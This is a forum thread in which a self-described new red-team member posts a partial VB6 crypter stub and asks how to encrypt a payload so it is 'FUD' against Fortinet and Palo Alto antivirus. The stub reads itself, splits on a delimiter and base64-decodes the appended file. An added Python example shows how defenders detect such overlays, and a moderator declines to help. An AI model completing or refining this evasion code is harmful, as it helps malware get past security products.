Thread: Pentesting - Crypter

  1. #1

    Thread Starter
    New Member
    Join Date
    Sep 2022
    Posts
    3

    Question Pentesting - Crypter

    Good fellow community members, I have been seeing some incredible topics on this forum,
    and I got curious because in my company we are starting the topic of AV evasion.

    So I got to it and installed VB6 (I am not a programmer, I understand the code only).
    I was looking for the best algorithm to encrypt the stub to be able to create a FUD, for Fortinet, Palo Alto, etc.

    I just joined the red team but as you understand I am embarrassed to go asking for help with something that to my understanding is not so complicated,
    I appreciate any response, greetings! I leave the code, the stub!

    Code:
    Sub main()
        Dim sMe() As String 'Array holding the stub and the encrypted file
        Dim sDelimitador As String 'Same as in the builder
        Dim b64 As New clsBase64 'Instance of the clsBase64 class
        Dim sDescifrado As String 'Decrypted file
        Dim sBinario() As Byte 'Byte array that will hold the decrypted file
        
        sDelimitador = "[Blau]Delimitador[Blau]" 'IMPORTANT: same delimiter as in the builder
        sMe = SplitMyself(sDelimitador)
        
        '[Array] sMe
        'sMe(0) = Stub
        'sMe(1) = Encrypted file
        
        sDescifrado = b64.Decode(sMe(1)) 'Store the decrypted file in the variable 'sDescifrado'
        sBinario = StrConv(sDescifrado, vbFromUnicode) 'Convert the decrypted file to a byte array
        
        
    End Sub
    
    Public Function GetCurrentPath() 'Function to get the file path
        GetCurrentPath = App.path & "\" & App.EXEName & ".exe"
    End Function
    
    Public Function ReadMyself() 'Function to read itself
        Dim ret As String
        Open GetCurrentPath For Binary As #1
            ret = Space(LOF(1))
            Get #1, , ret
        Close #1
        ReadMyself = ret
    End Function
    
    Public Function SplitMyself(sDelimitador As String) 'Function to split the stub from the encrypted file using the delimiter
        SplitMyself = Split(ReadMyself, sDelimitador)
    End Function
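
A defender's view of the file layout in the stub above (executable, then a delimiter, then a base64 blob appended to it), as an added example that is not part of the original post: it measures the data lying past a PE file's last section and flags base64 runs there that decode to an `MZ` header. The function names and the sample file are constructed for illustration.

```python
import base64
import re
import struct

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}")  # long base64-looking runs

def pe_overlay_offset(data: bytes) -> int:
    """File offset where the last section's raw data ends; bytes past it are overlay."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    (n_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # first section header
    end = table + 40 * n_sections             # headers are 40 bytes each
    for i in range(n_sections):
        # SizeOfRawData at +16, PointerToRawData at +20 in each header
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return min(end, len(data))

def triage_overlay(data: bytes) -> dict:
    """Report overlay size and whether a base64 run in it decodes to an MZ header."""
    off = pe_overlay_offset(data)
    overlay = data[off:]
    # A run is at least 64 chars, so its first 8 chars decode to 6 bytes.
    embedded = any(base64.b64decode(m.group()[:8]).startswith(b"MZ")
                   for m in B64_RUN.finditer(overlay))
    # Overlay alone is not a verdict: Authenticode signatures also sit there.
    return {"overlay_offset": off, "overlay_size": len(overlay),
            "embedded_pe": embedded}

def build_sample(overlay: bytes) -> bytes:
    """Constructed one-section PE skeleton (not a working program) plus overlay."""
    img = bytearray(0x400)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                  # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", img, 0x86, 1)                     # NumberOfSections
    struct.pack_into("<H", img, 0x94, 0xE0)                  # SizeOfOptionalHeader
    struct.pack_into("<II", img, 0x178 + 16, 0x200, 0x200)   # raw size, raw pointer
    return bytes(img) + overlay

if __name__ == "__main__":
    blob = base64.b64encode(b"MZ" + bytes(100))              # constructed, inert
    print(triage_overlay(build_sample(b"[Blau]Delimitador[Blau]" + blob)))
    print(triage_overlay(build_sample(b"")))
```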

  2. #2

    Thread Starter
    New Member
    Join Date
    Sep 2022
    Posts
    3

    Re: Pentesting - Crypter

    I have seen things like CryptoSys API, is it ok?

  3. #3

    Thread Starter
    New Member
    Join Date
    Sep 2022
    Posts
    3

    Re: Pentesting - Crypter

    Bump it.

  4. #4
    Super Moderator FunkyDexter
    Join Date
    Apr 2005
    Location
    An obscure body in the SK system. The inhabitants call it Earth
    Posts
    7,900

    Re: Pentesting - Crypter

    By AV Evasion, I assume you mean Anti Virus Evasion. If so you simply shouldn't be doing it and you're unlikely to get any help here.

    Instead you should be writing your software conforming to normal Operating System Best Practice such that it doesn't appear to be a virus. If you absolutely have to break best practice in some way then you should be contacting the major Anti Virus software providers to get your software white listed and/or informing your customers that your software is likely to be detected as a virus.

    If I've misunderstood and AV Evasion has some other meaning then I think you're going to have to be clearer about what you're asking.
    The best argument against democracy is a five minute conversation with the average voter - Winston Churchill

    Hadoop actually sounds more like the way they greet each other in Yorkshire - Inferrd
